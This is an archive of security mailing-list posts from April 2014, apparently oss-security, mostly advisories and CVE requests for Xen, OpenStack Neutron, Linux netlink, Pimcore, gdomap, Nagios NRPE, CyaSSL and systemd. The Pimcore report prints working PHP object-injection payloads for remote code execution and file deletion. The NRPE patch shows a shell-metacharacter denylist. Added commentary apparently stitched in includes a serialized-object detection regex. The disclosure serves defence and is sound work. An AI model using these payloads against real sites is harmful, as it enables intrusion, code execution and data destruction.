Xen.org security team | 23 Apr 17:13 2014

Xen Security Advisory 94 (CVE-2014-2986) - ARM hypervisor crash on guest interrupt controller access


              Xen Security Advisory CVE-2014-2986 / XSA-94
                             version 2

      ARM hypervisor crash on guest interrupt controller access

UPDATES IN VERSION 2
====================

This issue has been assigned CVE-2014-2986.

ISSUE DESCRIPTION
=================

When handling a guest access to the virtual GIC distributor (interrupt
controller) Xen could dereference a pointer before checking it for
validity leading to a hypervisor crash and host Denial of Service.

IMPACT
======

A buggy or malicious guest can crash the host.

VULNERABLE SYSTEMS
==================

Both 32- and 64-bit ARM systems are vulnerable from Xen 4.4 onward.

x86 systems are not vulnerable.


Xen.org security team | 23 Apr 12:20 2014

Xen Security Advisory 93 (CVE-2014-2915) - Hardware features unintentionally exposed to guests on ARM


             Xen Security Advisory CVE-2014-2915 / XSA-93
                              version 2

      Hardware features unintentionally exposed to guests on ARM

UPDATES IN VERSION 2
====================

This issue has been assigned CVE-2014-2915.

ISSUE DESCRIPTION
=================

When running on an ARM platform Xen was not correctly configuring the
hardware virtualisation platform and therefore did not prevent guests
from accessing various hardware features including cache control,
coprocessors, debug registers and various processor specific
registers.

IMPACT
======

By accessing these hardware facilities a malicious or buggy guest may
be able to cause various issues, including crashing the host, crashing
other guests (including control domains) and data corruption.

Privilege escalation is not thought to be possible but has not been
ruled out.


Andy Lutomirski | 22 Apr 23:37 2014

CVE-2014-0181: Linux network reconfiguration due to incorrect netlink checks

It is possible to reconfigure the network on Linux by calling write(2)
on an appropriately connected network socket.  By passing such a
socket as stdout or stderr to a setuid program, anyone can reconfigure
the network.

Eric Biederman sent patches to netdev containing a possible fix.

-- 
Andy Lutomirski
AMA Capital Management, LLC

Xen.org security team | 22 Apr 17:06 2014

Xen Security Advisory 93 - Hardware features unintentionally exposed to guests on ARM


                    Xen Security Advisory XSA-93

      Hardware features unintentionally exposed to guests on ARM

ISSUE DESCRIPTION
=================

When running on an ARM platform Xen was not correctly configuring the
hardware virtualisation platform and therefore did not prevent guests
from accessing various hardware features including cache control,
coprocessors, debug registers and various processor specific
registers.

IMPACT
======

By accessing these hardware facilities a malicious or buggy guest may
be able to cause various issues, including crashing the host, crashing
other guests (including control domains) and data corruption.

Privilege escalation is not thought to be possible but has not been
ruled out.

VULNERABLE SYSTEMS
==================

Both 32- and 64-bit ARM systems are vulnerable from Xen 4.4 onwards.

x86 systems are not vulnerable.

Tristan Cacqueray | 22 Apr 15:15 2014

[OSSA 2014-014] Neutron security groups bypass through invalid CIDR (CVE-2014-0187)

OpenStack Security Advisory: 2014-014
CVE: CVE-2014-0187
Date: April 22, 2014
Title: Neutron security groups bypass through invalid CIDR
Reporters: Stephen Ma (HP) and Christoph Thiel (Deutsche Telekom)
Products: Neutron
Versions: 2013.1 to 2013.2.3, and 2014.1

Description:
Stephen Ma from Hewlett Packard and Christoph Thiel from Deutsche
Telekom reported a vulnerability in Neutron security groups. By creating
a security group rule with an invalid CIDR, an authenticated user may
break openvswitch-agent process, preventing further rules from being
applied on the host. Note: removal of the faulty rule is not enough, the
openvswitch-agent must be restarted. All Neutron setups using Open
vSwitch are affected.

Juno (development branch) fix:
https://review.openstack.org/59212

Icehouse fix:
https://review.openstack.org/88674

Havana fix:
https://review.openstack.org/88057

Notes:
This fix will be included in the juno-1 development milestone and in
future 2013.2.4 and 2014.1.1 releases.


Pedro Ribeiro | 19 Apr 12:54 2014

CVE request: Fwd: Remote code execution in Pimcore CMS

Resending this as it hasn't been picked up most likely because of the lack of "CVE request" in the subject line.

Regards
Pedro

---------- Forwarded message ----------
From: "Pedro Ribeiro" <pedrib-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
Date: 14 Apr 2014 10:16
Subject: Remote code execution in Pimcore CMS
To: <oss-security-ZwoEplunGu1jrUoiu81ncdBPR1lH4CV8@public.gmane.org>
Cc: "Bernhard Rusch" <Bernhard.Rusch-cs4as8ShrIbk7+2FdBfRIA@public.gmane.org>

Hi,

I have discovered a PHP object injection in Pimcore CMS.

Depending on the PHP version under which Pimcore is running, it is possible to achieve remote code execution in the worst case, and arbitrary file deletion at best.

Please find attached the report, which is also available at

https://github.com/pedrib/PoC/blob/master/pimcore-2.1.0.txt

Can you please provide a CVE number for this?

Thanks in advance.

Regards
Pedro

> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security

====================================================================
Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-HERE)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)

Summary:
This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the
newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve
remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from
[3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all
PHP versions.

Versions affected:
1.4.9 to 1.4.10 (inclusive): Remote code execution (when server is running PHP <= 5.3.3).
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.

Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on
Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might
be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not
possible, but the requirement was only enforced in 2.0.1.
Note, however, that the underlying vulnerability for both the remote code execution and the arbitrary file
deletion is the same (unserialize() object injection), so it might be possible to execute code if any
other Zend PHP POP chains are found in the future.

Fix for vulnerability:
https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280

Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):
https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7

PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):
https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b

Code snippets:

pimcore/lib/Pimcore/Tool/Newsletter.php(221):

    public function getObjectByToken($token) {
        $data = unserialize(base64_decode($token));
        if($data) {
            if($object = Object_Abstract::getById($data["id"])) {

                if($version = $object->getLatestVersion()) {
                    $object = $version->getData();
                }

This function is called in the same file in confirm() and unsubscribeByToken():
    public function confirm($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

    public function unsubscribeByToken ($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and are encouraged
to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
    public function confirmAction() {

        $this->enableLayout();

        $this->view->success = false;

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        if($newsletter->confirm($this->getParam("token"))) {
            $this->view->success = true;
        }

And also in unsubscribeAction():
    public function unsubscribeAction() {

        $this->enableLayout();

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        $unsubscribeMethod = null;
        $success = false;

        if($this->getParam("email")) {
            $unsubscribeMethod = "email";
            $success = $newsletter->unsubscribeByEmail($this->getParam("email"));
        }

        if($this->getParam("token")) {
            $unsubscribeMethod = "token";
            $success = $newsletter->unsubscribeByToken($this->getParam("token"));
        }

Mitigation:
Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of
unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.

References:
========================================================
[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)
<?php

class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php phpinfo(); die;?>';
}

class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;

    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}

interface Zend_Pdf_ElementFactory_Interface {}

class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;

    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}

class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;

    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}

// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);

echo base64_encode(serialize($____proxy));

?>

========================================================
[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
[3] http://www.exploit-db.com/exploits/19573
========================================================
[4] Arbitrary file deletion, all PHP versions
<?php
class Zend_Http_Response_Stream
{
    protected $stream;
    protected $stream_name;
    protected $_cleanup;
    public function setStream($stream)
    {
        $this->stream = $stream;
        return $this;
    }
    public function setCleanup($cleanup = true) {
        $this->_cleanup = $cleanup;
    }
    public function setStreamName($stream_name) {
        $this->stream_name = $stream_name;
        return $this;
    }
}
$resp = new Zend_Http_Response_Stream();
$resp->setStream(null);
$resp->setCleanup();
$resp->setStreamName("/tmp/deleteme");

echo base64_encode(serialize($resp));
?>

========================================================
[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter
[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip).
The file mentioned is website/controllers/NewsletterController.php.

Other references:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://vagosec.org/2013/12/wordpress-rce-exploit/
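
The mitigation given in the report (JSON instead of unserialize()) as an added example that is not Pimcore's code: the vulnerable shape of getObjectByToken() next to a hardened decoder that validates the token's fields, plus a small check for tokens that carry a serialized PHP object, usable on request logs. Assumes PHP 7.1+; the token layout {"id": N} and the sample tokens are constructed.

```php
<?php
// Added example, not Pimcore's code. Assumed token layout: base64 of {"id": <int>}.

// Vulnerable shape, as in Newsletter.php(221): any serialized PHP object in the
// token is instantiated, which is the object injection point.
function getDataByTokenUnsafe(string $token)
{
    $data = unserialize(base64_decode($token));
    return $data ? $data : null;
}

// Hardened: JSON decoding never instantiates classes, and the only field the
// caller needs (the object id) is validated before use.
function getIdFromTokenSafe(string $token): ?int
{
    $raw = base64_decode($token, true);            // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true);               // associative arrays only, no objects
    if (!is_array($data) || !isset($data['id']) || !is_int($data['id']) || $data['id'] < 1) {
        return null;
    }
    return $data['id'];
}

// Detection helper for log review: does a base64 token decode to something that
// contains a serialized PHP object (O:<len>:"Class" or C:<len>:"Class")?
function tokenCarriesPhpObject(string $token): bool
{
    $raw = base64_decode($token, true);
    return $raw !== false && preg_match('/(^|[;{])[OC]:\d+:"/', $raw) === 1;
}

// Constructed sample tokens: a legitimate JSON token and a harmless stdClass payload.
$legit    = base64_encode(json_encode(['id' => 42]));
$injected = base64_encode('O:8:"stdClass":0:{}');

var_dump(getIdFromTokenSafe($legit));        // accepted: the validated id
var_dump(getIdFromTokenSafe($injected));     // rejected: not JSON
var_dump(tokenCarriesPhpObject($injected));  // flagged for review
```

On PHP 7.0 and later, unserialize($s, ['allowed_classes' => false]) also prevents class instantiation as a defence in depth, but switching the token format to JSON, as the 2.2.0 fix did, removes the unserialize() call entirely.
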
Matthew Daley | 19 Apr 02:51 2014

CVE request / advisory: gdomap (GNUstep core package <= 1.24.6)

Hi,

I'd like to request a CVE ID for this issue. It was found in software
from GNUstep (www.gnustep.org), which develops an open-source
development framework and runtime for client and server applications.

This is the first such request and the issue is (now) public; this
message serves as an advisory as well.

Affected software: gdomap (GNUstep Distributed Objects nameserver)
Description: After receiving a crafted invalid request, gdomap will
attempt to log an error message to the system logger. However, due to
incorrect setup of the logger during server initialization, the logger
and gdomap itself will mess up program state enough that program
execution will be aborted. gdomap listens on all interfaces, allowing
a remote unauthenticated attacker to DoS the nameserver. (Please see
the bug tracker entry for more detailed information.)
Bug tracker: https://savannah.gnu.org/bugs/?41751
Affected versions: current releases (GNUstep core package <= 1.24.6)
Fix: http://svn.gna.org/viewcvs/gnustep/libs/base/trunk/Tools/gdomap.c?r1=37756&r2=37755&pathrev=37756
Release notes: http://svn.gna.org/viewcvs/gnustep/libs/base/trunk/ChangeLog?r1=37756&r2=37755&pathrev=37756
Reported by: Matthew Daley

Please let me know if you need any further information.

Thanks,

- Matthew Daley

Forest Monsen | 18 Apr 19:40 2014

CVE Request for Drupal Core

Hi there,

Please issue a CVE identifier for:

SA-CORE-2014-002 - Drupal core - Information Disclosure
https://drupal.org/SA-CORE-2014-002

Thanks!

Best,
Forest
Eduardo Tongson | 18 Apr 04:14 2014

CVE Request: Nagios Remote Plugin Executor <= 2.15 Remote Command Execution

Details: http://seclists.org/fulldisclosure/2014/Apr/240
This is similar to CVE-2013-1362

Is there a CVE already assigned for this issue?

Fix:

--- nrpe/src/nrpe.c
+++ nrpe/src/nrpe.c
 <at>  <at>  -42,7 +42,7  <at>  <at>  int use_ssl=FALSE;

 #define DEFAULT_COMMAND_TIMEOUT    60            /* default timeout
for execution of plugins */
 #define MAXFD                   64
-#define NASTY_METACHARS         "|`&><'\"\\[]{};"
+#define NASTY_METACHARS         "|`&><'\"\\[]{};\n"

 char    *command_name=NULL;
 char    *macro_argv[MAX_COMMAND_ARGUMENTS];
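Review bot: the hunk only appends `\n` to the NASTY_METACHARS denylist, and a denylist of shell metacharacters is hard to keep complete, so this should be paired with, or replaced by, an allowlist check on the characters permitted in plugin arguments; at minimum add a comment next to the define recording why newline is rejected, since nothing in the diff explains it.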

Raphael Geissert | 17 Apr 14:13 2014

CVE ids for CyaSSL 2.9.4?

Hi,

[CC'ing Ivan Fratric and one of the many @wolfssl addresses I found]

CyaSSL 2.9.4 fixes a number of security issues.

From [3]:
> Issue #1 (Memory Corruption)
> Issue #2 (Out of bounds read)
> Issue #3 (Dangerous Default Behavior, out of bounds read)
> Issue #4 (NULL pointer dereference)
> Issue #5 (Unknown Critical Certificate Extension Allowed)

Have CVE ids been assigned already? If not, could they be assigned?

Thanks in advance.

References:
[0]http://www.wolfssl.com/yaSSL/Docs-cyassl-changelog.html
[1]http://www.yassl.com/forums/topic539-cyassl-294-released.html
[2]http://www.yassl.com/yaSSL/Blog/Entries/2014/4/9_CyaSSL_2.9.4_Released.html
[3]http://www.yassl.com/yaSSL/Blog/Entries/2014/4/11_wolfSSL_Security_Advisory__April_9%2C_2014.html

Cheers,
-- 
Raphael Geissert - Debian Developer
www.debian.org - get.debian.net

Marc Deslauriers | 17 Apr 13:39 2014

CVE Request: systemd stack-based buffer overflow in systemd-ask-password

Hello,

From the Red Hat bug:
A stack-based buffer overflow was found in systemd-ask-password, a utility used
to query a system password or passphrase from the user, using a question message
specified on the command line. A local user could use this flaw to crash the binary
or even execute arbitrary code with the permissions of the user running the program.

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1084286

Fix:
http://cgit.freedesktop.org/systemd/systemd/commit/?id=036eeac5a1799fa2c0ae11a14d8c667b5d303189

Could a CVE please be assigned to this issue?

Thanks,

Marc.

-- 
Marc Deslauriers
Ubuntu Security Engineer     | http://www.ubuntu.com/
Canonical Ltd.               | http://www.canonical.com/
